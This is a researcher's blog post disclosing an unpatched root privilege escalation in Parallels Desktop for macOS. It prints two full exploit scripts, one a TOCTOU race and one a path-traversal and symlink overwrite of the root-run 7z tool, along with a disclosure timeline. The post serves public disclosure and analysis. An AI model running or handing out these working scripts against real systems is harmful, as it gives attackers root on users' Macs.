Dropping a 0 day: Parallels Desktop Repack Root Privilege Escalation

Today, I am disclosing a 0-day vulnerability that bypasses the patch for CVE-2024-34331. I have identified two distinct methods to circumvent the fix. Both bypasses were reported separately to the Zero Day Initiative (ZDI) and the affected vendor Parallels. Unfortunately, their responses have been deeply unsatisfactory.

Given that the vendor has left this vulnerability unaddressed for over seven months—despite prior disclosure—I have chosen to publicly disclose this 0-day exploit. My goal is to raise awareness and urge users to mitigate risks proactively, as attackers could leverage this flaw in the wild.


After reading Mykola’s blog about the old CVE-2024-34331, I realized that Parallels’ patch is really easy to bypass:


It’s recommended to read his original blog first.


The patching code is to verify whether the tool createinstallmedia is Apple-signed. If yes, then it will spawn the tool createinstallmedia with root privilege. Otherwise, it will exit with an error.

There are at least two different ways to bypass the verification here:

  1. Bypass via a TOCTOU attack: After passing the signature verification, and before it spawns the tool, an attacker has enough time to replace the tool createinstallmedia with a malicious one!
  2. The requirement string “anchor apple” for the signature verification is too weak! An attacker can find an Apple-signed executable binary (e.g., the system command ls), and then inject a malicious DYLIB into the Apple’s binary to bypass the signature verification directly! I have talked about this trick in my previous blog.

Exploit 1

The exploit script for the function do_repack_createinstallmedia is as follows:

# Bypass the patch of CVE-2024-34331 via TOCTOU

echo "[?] whoami; id"

echo "[*] Dropping a payload..."
cat << EOF > /tmp/payload
touch /Library/lpe
/System/Applications/Utilities/Terminal.app/Contents/MacOS/Terminal &

chmod +x /tmp/payload

echo "[*] Dropping a fake macOS installer..."
mkdir -p /tmp/poc.app/Contents/Resources
cp /bin/ls /tmp/poc.app/Contents/Resources/createinstallmedia
defaults write /tmp/poc.app/Contents/Info.plist CFBundleDisplayName createinstallmedia

echo "[*] Trigger the repack..."
open /tmp/poc.app -a /Applications/Parallels\ Desktop.app

echo "[*] Waitting for the verification..."
# Check if the random directory exists
while [ -z "$(ls -d $dir_pattern 2>/dev/null)" ]; do

mv /tmp/payload /tmp/poc.app/Contents/Resources/createinstallmedia
echo "[*] All done. Enjoy the root shell :P"


Mykola post his blog on May 30.

I reported this bypass to the ZDI immediately on May 31.

However, the ZDI is too late to handle this report, then something changed:


The ZDI told me that they couldn’t reproduce the exploit on the version 19.4.1, but the latest version was 19.4.0 when I submitted this report. They began to investigate this case six weeks after my report!

Something changed since the version 19.4.1

Through my research, I found that the repack command line was changed in the executable binary prl_disp_service:


In the version 19.4.0, the command line is: /bin/bash /Applications/Parallels Desktop.app/Contents/Resources//repack_osx_install_app.sh repack /private/tmp/poc.app /Users/fuzz/Parallels/macOS image file.iso -w

In the version 19.4.1, the command line is: /bin/bash /Applications/Parallels Desktop.app/Contents/Resources//repack_osx_install_app.sh repack /private/tmp/poc.app /Users/fuzz/Parallels/macOS image file.dmg -w -z /Applications/Parallels Desktop.app/Contents/MacOS//7z

From the script Parallels Desktop.app/Contents/Resources/repack_osx_install_app.sh:

do_repack() {
	# Parse and check args/options
	if [[ $# -lt 2 ]]; then
		echo "Please specify the app bundle and resulting image file path."

	local source_app="${1%/}"
	local result_dmg="$2"
	shift 2

	local overwrite="n"
	local p7z_tool=""
	while getopts wz: OPT; do
		case "$OPT" in
		w) overwrite="y" ;;
		z) p7z_tool="$OPTARG" ;;
	# Do repack (using 7z tool, if specified, or native tools only)
	if [[ -f "$source_app/Contents/SharedSupport/InstallESD.dmg" || -n "$p7z_tool" ]]; then
		do_repack_manual "$source_app" "$result_dmg" "$p7z_tool"
		do_repack_createinstallmedia "$source_app" "$result_dmg"

We can know that it now uses the function do_repack_manual, instead of the function do_repack_createinstallmedia.

The new issue

Okay, let’s check the function do_repack_manual:

do_repack_manual() {
	local source_app="$1"
	local result_dmg="$2"
	local p7z_tool="$3"

	# make temp directory for files manupulation
	temp_dir="$(mktemp -d -t 'osx_install_diskimage')"
	local temp_contents_dir="$temp_dir"/contents
	mkdir "$temp_contents_dir"

	local source_app_basename="$(basename "$source_app")"

	local result_vol_name="$(defaults read "$source_app"/Contents/Info CFBundleDisplayName)"
	local temp_result_dir=""

	local kernelcache_name=""
	local bootefi_name=""

	if [[ -z "$p7z_tool" ]]; then
		local base_system_dmg=""
		local temp_base_system_dmg=""

		if [[ -e "$source_app"/Contents/SharedSupport/BaseSystem.dmg ]]; then
		elif [[ -e "$source_app"/Contents/SharedSupport/InstallESD.dmg ]]; then
		elif [[ -e "$source_app"/Contents/SharedSupport/SharedSupport.dmg ]]; then

		# Extract (via 7z) boot.efi, prelinkedkernel, ... from BaseSystem.dmg
		[ -e "$base_system_dmg" ] && "$p7z_tool" e -aos -o"$temp_contents_dir" "$base_system_dmg" \
			*/System/Library/PrelinkedKernels/prelinkedkernel \
			*/System/Library/Caches/com.apple.kext.caches/Startup/kernelcache \
			*/System/Library/CoreServices/bootbase.efi \
			*/System/Library/CoreServices/boot.efi \
			*/System/Library/CoreServices/SystemVersion.plist \

		[ -z "$temp_base_system_dmg" ] || rm -- "$temp_base_system_dmg"

	if [[ -z "$p7z_tool" ]]; then
		# Make directory for "hybrid CD" creation
		mkdir "$temp_result_dir"

	# Compose resulting .dmg contents (copy .app bundle, boot and kernel files, ...)

	move_file "$temp_contents_dir"/"$bootefi_name" "$temp_result_dir"/System/Library/CoreServices/boot.efi
	move_file "$temp_contents_dir"/SystemVersion.plist "$temp_result_dir"/System/Library/CoreServices/SystemVersion.plist
	move_file "$temp_contents_dir"/PlatformSupport.plist "$temp_result_dir"/System/Library/CoreServices/PlatformSupport.plist

	if [[ -e "$temp_contents_dir"/"$kernelcache_name" ]]; then

	if [[ -e "$source_app"/Contents/SharedSupport/SharedSupport.dmg ]]; then

	# Copy source .app into image
	cp -R "$source_app" "$temp_result_dir"

	if [[ -z "$p7z_tool" ]]; then
		rm -rf -- "$temp_result_dir"
		"$p7z_tool" e -tapm -so -aos "$temp_hybrid_cd_dmg" *.hfs > "$temp_hfs_partition_dmg" || true

At line 13: the variable $result_vol_name is controlled by an attacker, and thus the path $temp_result_dir at line 50 is also controlled.

At line 70 (# Copy source .app into image): both the source path $source_app and the destination path $temp_result_dir are controlled. So an attacker can get a primitive to write arbitrary contents to an arbitraty root-owned path.

In my exploit below, I overwrite the $p7z_tool, which will be spawned at line 77 with root privilege. (This is allowed by TCC App Management.)

There are some challenges for my exploit due to the error handling code in the repack_osx_install_app.sh:

trap "cleanup; exit $ERR_UNEXPECTED" ERR
  1. At line 51, the $temp_result_dir shouldn’t exist, otherwise mkdir will return an error.
    1. Solution: Use a symlink to redirect the root-owned result folder.
  2. From line 56 to 58, the source paths must exist for the move_file operation, otherwise it will return the error: path not exist.
    1. Solution: Make a crafted BaseSystem.dmg for 7z to extract.

Exploit 2

The new exploit script for the function do_repack_manual is as follows:


echo "[?] whoami; id"

echo "[*] Dropping a payload..."
cat << EOF > /tmp/payload
touch /Library/lpe

chmod +x /tmp/payload

echo "[*] Dropping a fake macOS installer..."
mkdir -p /tmp/poc.app/Contents/Resources
mv /tmp/payload /tmp/poc.app/Contents/Resources/createinstallmedia
defaults write /tmp/poc.app/Contents/Info.plist CFBundleDisplayName ../../../../../../tmp/lnk/result

# redirect the root-owned folder "result"
mkdir /tmp/redirect
ln -s /tmp/redirect /tmp/lnk

echo "[*] Dropping a fake BaseSystem.dmg..."
mkdir -p /tmp/tmp/System/Library/CoreServices/
touch /tmp/tmp/System/Library/CoreServices/boot.efi
touch /tmp/tmp/System/Library/CoreServices/SystemVersion.plist
touch /tmp/tmp/System/Library/CoreServices/PlatformSupport.plist
/Applications/Parallels\ Desktop.app/Contents/MacOS/7z a 1.zip /tmp/tmp
mkdir -p /tmp/poc.app/Contents/SharedSupport/
mv 1.zip /tmp/poc.app/Contents/SharedSupport/BaseSystem.dmg

mkdir -p /tmp/dst/result/poc.app/Contents/Resources
# in the command:
# cp -R "$source_app" "$temp_result_dir"
# the 7z command will be replaced by my payload
ln -s /Applications/Parallels\ Desktop.app/Contents/MacOS/7z /tmp/dst/result/poc.app/Contents/Resources/createinstallmedia

echo "[*] Trigger the repack..."
open /tmp/poc.app -a /Applications/Parallels\ Desktop.app

echo "[*] Waitting for the temp_result_dir..."
while [ ! -d "/tmp/redirect/result" ]; do
ln -sfn /tmp/dst /tmp/lnk

echo "[*] All done. Enjoy the root shell :P"


This time, I don’t trust the ZDI any more. So I decided to report this new issue to the vendor directly:


Date Action
2024-07-22 Me: Initial report sent to security@parallels.com
2024-07-23 Parallels: Will analyze the report
2024-10-23 Me: Ask for an update -> No response
2025-02-12 Me: Ask for an update -> No response
2025-02-19 Me: Ask for an update -> No response
2025-02-20 Me: 0 day disclosure

Since the vendor Parallels is playing deaf and dumb, I have to disclose the 0 day exploit now. Both the Zero Day Initiative (ZDI) and the affected vendor Parallels are disappointing, aren’t they?

0 day for the lastest version

Through my test, I found that Parallels has revert the change on the version 19.4.1.

Now, they’ve switched back to using the function do_repack_createinstallmedia.

So my exploit 1 works on the latest version 20.2.1 (55876), demo video:


Written on February 20, 2025